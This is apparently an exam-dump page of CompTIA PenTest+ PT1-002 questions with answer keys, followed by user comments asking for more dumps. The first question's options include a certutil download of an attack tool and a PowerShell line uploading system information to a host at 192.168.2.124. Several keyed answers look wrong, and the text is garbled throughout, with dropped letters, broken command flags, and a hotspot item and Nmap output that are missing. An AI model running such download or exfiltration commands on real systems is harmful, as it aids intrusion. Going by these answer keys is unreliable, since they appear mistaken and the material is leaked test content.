CompTIA PenTest+ PT1-002 Dumps in PDF

Free CompTIA PT1-002 Real Questions (page: 2)

A penetration tester has obtained a low-privilege shell on a Windows server with a default con guration and now wants to explore the ability to exploit miscon gured service permissions.
Which of the following commands would help the tester START this process?

  1. certutil "urlcache "split "f http://192.168.2.124/windows-binaries/accesschk64.exe
  2. powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/upload.php', 'systeminfo.txt')
  3. schtasks /query /fo LIST /v | nd /I Next Run Time:
  4. wget http://192.168.2.124/windows-binaries/accesschk64.exe "O accesschk64.exe

Answer(s): B


Reference:

https://infosecwriteups.com/privilege-escalation-in-windows-380bee3a2842



HOTSPOT (Drag and Drop is not supported)
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were agged as malicious.

INSTRUCTIONS:
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future. If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:

  1. See Explanation section for answer.

Answer(s): A

Explanation:



Which of the following protocols or technologies would provide in-transit con dentiality protection for emailing the nal security assessment report?

  1. S/MIME
  2. FTPS
  3. DNSSEC
  4. AS2

Answer(s): A


Reference:

https://searchsecurity.techtarget.com/answer/What-are-the-most-important-email-security-protocols



A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key ndings are as follows:
* The following request was intercepted going to the network device:

GET /login HTTP/1.1 -
Host: 10.50.100.16 -
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0

Accept-Language: en-US,en;q=0.5 -

Connection: keep-alive -
Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
* Network management interfaces are available on the production network.
* An Nmap scan returned the following:



Which of the following would be BEST to add to the recommendations section of the nal report? (Choose two.)

  1. Enforce enhanced password complexity requirements.
  2. Disable or upgrade SSH daemon.
  3. Disable HTTP/301 redirect con guration.
  4. Create an out-of-band network for management.
  5. Implement a better method for authentication.
  6. Eliminate network management and control interfaces.

Answer(s): C,E



A penetration tester ran a ping `"A command during an unknown environment test, and it returned a 128 TTL packet.
Which of the following OSs would MOST likely return a packet of this type?

  1. Windows
  2. Apple
  3. Linux
  4. Android

Answer(s): A


Reference:

https://www.freecodecamp.org/news/how-to-identify-basic-internet-problems-with-ping/



Share your comments for CompTIA PT1-002 exam with other users:

V
vikas
10/28/2023 6:57:00 AM

provide access

A
Abdullah
9/29/2023 2:06:00 AM

good morning

R
Raj
6/26/2023 3:12:00 PM

please upload the ncp-mci 6.5 dumps, really need to practice this one. thanks guys

M
Miguel
10/5/2023 12:21:00 PM

question 16: https://help.salesforce.com/s/articleview?id=sf.care_console_overview.htm&type=5

H
Hiren Ladva
7/8/2023 10:34:00 PM

yes i m prepared exam

O
oliverjames
10/24/2023 5:37:00 AM

my experience was great with this site as i studied for the ms-900 from here and got 900/1000 on the test. my main focus was on the tutorials which were provided and practice questions. thanks!

B
Bhuddhiman
7/20/2023 11:52:00 AM

great course

A
Anuj
1/14/2024 4:07:00 PM

very good question

S
Saravana Kumar TS
12/8/2023 9:49:00 AM

question: 93 which statement is true regarding the result? sales contain 6 columns and values contain 7 columns so c is not right answer.

L
Lue
3/30/2023 11:43:00 PM

highly recommend just passed my exam.

D
DC
1/7/2024 10:17:00 AM

great practice! thanks

A
Anonymus
11/9/2023 5:41:00 AM

anyone who wrote this exam recently?

K
Khalid Javid
11/17/2023 3:46:00 PM

kindly share the dump

N
Na
8/9/2023 8:39:00 AM

could you please upload cfe fraud prevention and deterrence questions? it will be very much helpful.

S
shime
10/23/2023 10:03:00 AM

this is really very very helpful for mcd level 1

V
Vnu
6/3/2023 2:39:00 AM

very helpful!

S
Steve
8/17/2023 2:19:00 PM

question #18s answer should be a, not d. this should be corrected. it should be minvalidityperiod

R
RITEISH
12/24/2023 4:33:00 AM

thanks for the exact solution

S
SB
10/15/2023 7:58:00 AM

need to refer the questions and have to give the exam

M
Mike Derfalem
7/16/2023 7:59:00 PM

i need it right now if it was possible please

I
Isak
7/6/2023 3:21:00 AM

i need it very much please share it in the fastest time.

M
Maria
6/23/2023 11:40:00 AM

correct answer is d for student.java program

N
Nagendra Pedipina
7/12/2023 9:10:00 AM

q:37 c is correct

J
John
9/16/2023 9:37:00 PM

q6 exam topic: terramearth, c: correct answer: copy 1petabyte to encrypted usb device ???

S
SAM
12/4/2023 12:56:00 AM

explained answers

A
Andy
12/26/2023 9:35:00 PM

plan to take theaws certified developer - associate dva-c02 in the next few weeks

S
siva
5/17/2023 12:32:00 AM

very helpfull

M
mouna
9/27/2023 8:53:00 AM

good questions

B
Bhavya
9/12/2023 7:18:00 AM

help to practice csa exam

M
Malik
9/28/2023 1:09:00 PM

nice tip and well documented

R
rodrigo
6/22/2023 7:55:00 AM

i need the exam

D
Dan
6/29/2023 1:53:00 PM

please upload

A
Ale M
11/22/2023 6:38:00 PM

prepping for fsc exam

A
ahmad hassan
9/6/2023 3:26:00 AM

pd1 with great experience

AI Tutor 👋 I’m here to help!